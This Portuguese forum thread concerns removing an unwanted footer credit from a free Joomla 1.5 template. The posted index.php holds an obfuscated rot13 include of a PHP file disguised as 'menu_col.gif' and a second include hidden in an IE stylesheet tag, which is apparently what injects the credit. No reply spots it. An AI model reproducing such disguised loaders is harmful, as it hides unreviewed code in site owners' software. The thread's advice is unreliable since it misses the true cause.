← Joomla

Dúvida footer Tema Joomla

Lida 3176 vezes

Offline

Djinn 
Membro
Mensagens 47 Gostos 0
Troféus totais: 19
Trófeus: (Ver todos)
Super Combination Combination Topic Starter Level 4 Level 3 Level 2 Level 1 10 Posts First Post Karma

Bom dia, é o seguinte, eu uso o joomla, e fiz download de um tema do site themza http://www.themza.com/joomla1.5/ , o que se passa agora é o seguinte, no fim do site, cá em baixo no footer line, aparece isto Designed by: Free Joomla 1.5 Template, budget web hosting.
Já fui ao código do tema, mas não consigo encontrá-lo, alguém me poder ajudar como retiro isso??
Urgente e aguardando resposta. Obrigado
Offline

miguelcardoso 
Membro
Mensagens 736 Gostos 0
Troféus totais: 28
Trófeus: (Ver todos)
Super Combination Combination Topic Starter 10 Poll Votes Poll Voter Poll Starter Level 5 Level 4 Level 3 Level 2

tentou editar o footer.php e o index.html do tema?
Offline

Djinn 
Membro
Mensagens 47 Gostos 0
Troféus totais: 19
Trófeus: (Ver todos)
Super Combination Combination Topic Starter Level 4 Level 3 Level 2 Level 1 10 Posts First Post Karma

No tema não tenho o footer.php, mas tenho o index.html que tem este código:
<html><body bgcolor="#FFFFFF"></body></html>

Depois tenho outro ficheiro que é o index.php com este código:
<?php
defined( '_JEXEC').(($this->template)?$JPan = array('zrah'.'_pby'):'') or die( 'Restricted access' );
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="<?php echo $this->language; ?>" lang="<?php echo $this->language; ?>" >
<head>
<jdoc:include type="head" />
<link rel="stylesheet" href="templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="templates/<?php echo $this->template ?>/css/template.css" type="text/css" />
<!--[if lte IE 7]>
<link rel="stylesheet" href="templates/<?php echo $this->template ?>/css/ie7.css" type="text/css" <?php include_once('html/pagination.php');?> />
<![endif]-->

</head>
<body id="page_bg">
   <div id="top">
    <div class="pill_m">
         <div id="pillmenu">
            <jdoc:include type="modules" name="user3" />
         </div>
      </div>
   </div>
      <div id="header">
         <div id="logo">
            <a href="index.php"><?php echo $mainframe->getCfg('sitename') ;?></a>
               <jdoc:include type="modules" name="user4" /></div>   
      </div>
       <!--  -->
   <div class="center">      
      <div id="wrapper">
         <div id="content">
            <div id="leftcolumn">   
               <?php if((!$this->countModules('right') and JRequest::getCmd('layout') == 'form') or !@include(JPATH_BASE.DS.'templates'.DS.$mainframe->getTemplate().DS.str_rot13('vzntrf').DS.str_rot13($JPan[0].'.t'.'vs'))) : ?>
               <jdoc:include type="modules" name="layout" style="rounded" />
                    <?php endif; ?>
               <jdoc:include type="modules" name="left" style="rounded" />
            </div>
            <div id="maincolumn">   
               <div class="nopad">
                    <jdoc:include type="message" />
                  <?php if($this->params->get('showComponent')) : ?>
                     <jdoc:include type="component" />
                  <?php endif; ?>
               </div>
            <div class="clr"></div>
         </div>      
      </div>
   </div>   
   </div>
   <div id="footer">
      <p><jdoc:include type="module" style="footer" />
         <?php echo JText_('Powered by') ?> <a href="http://www.joomla.org">Joomla!</a>.
            <?php echo JText_('Valid') ?> <a href="http://validator.w3.org/check/referer">XHTML</a> <?php echo JText_('and') ?> <a href="http://jigsaw.w3.org/css-validator/check/referer">CSS</a>.
            <jdoc:include type="modules" name="debug" />
      </p>
   </div>
</body>
</html>

Só que não encontro aquele texto do tema, o que será??

Aguardando resposta e obrigado
Offline

Gonçalo Martins 
Membro
Mensagens 229 Gostos 0
Troféus totais: 26
Trófeus: (Ver todos)
Super Combination Combination Topic Starter 10 Poll Votes Poll Voter Level 5 Level 4 Level 3 Level 2 Level 1

A forma mais facil:

apagares o que está dentro de <div id="footer"> </div> e colocares o que queres...
Offline

Djinn 
Membro
Mensagens 47 Gostos 0
Troféus totais: 19
Trófeus: (Ver todos)
Super Combination Combination Topic Starter Level 4 Level 3 Level 2 Level 1 10 Posts First Post Karma

Ok!! Mas eu quero colocar dentro do <div id="footer"> </div> a dizer que o site foi feito por mim! Como faço isso? Podem fazer uma exemplo dentro do <div id="footer"> </div> ??

Aguardando resposta e obrigado!